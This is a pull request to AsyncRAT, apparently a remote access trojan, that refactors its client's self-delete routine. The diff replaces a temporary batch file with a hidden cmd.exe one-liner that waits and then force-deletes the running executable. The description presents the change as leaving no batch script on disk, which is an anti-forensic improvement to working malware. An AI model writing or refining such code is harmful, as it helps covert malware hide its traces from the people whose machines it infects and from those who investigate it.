### PR TITLE
Refactored Self Delete Method

### DIFF
--- a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
@@ -38,25 +38,14 @@ namespace Plugin.Handler
                 Registry.CurrentUser.CreateSubKey(@"SOFTWARE\", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid);
             }
             catch { }
-
-            string batch = Path.GetTempFileName() + ".bat";
-            using (StreamWriter sw = new StreamWriter(batch))
-            {
-                sw.WriteLine("@echo off");
-                sw.WriteLine("timeout 3 > NUL");
-                sw.WriteLine("CD " + Application.StartupPath);
-                sw.WriteLine("DEL " + "\"" + Path.GetFileName(Application.ExecutablePath) + "\"" + " /f /q");
-                sw.WriteLine("CD " + Path.GetTempPath());
-                sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
-            }
+            
             Process.Start(new ProcessStartInfo()
-            {
-                FileName = batch,
-                CreateNoWindow = true,
-                ErrorDialog = false,
-                UseShellExecute = false,
-                WindowStyle = ProcessWindowStyle.Hidden
-            });
+                {
+                    Arguments = "/C choice /C Y /N /D Y /T 5 & Del \"" + Application.ExecutablePath + "\"",
+                    WindowStyle = ProcessWindowStyle.Hidden,
+                    CreateNoWindow = true,
+                    FileName = "cmd.exe"
+                });
 
             Methods.ClientExit();
             Environment.Exit(0);


### PR DESCRIPTION
Currently the method works by writing a .batch script to disk, this method isn't very efficient and can be achieved by passing commands to CMD's startup parameters (/c) and a delay of 5 seconds (/t 5). We also don't have to worry about leaving a .bat script on the disk after the client is uninstalled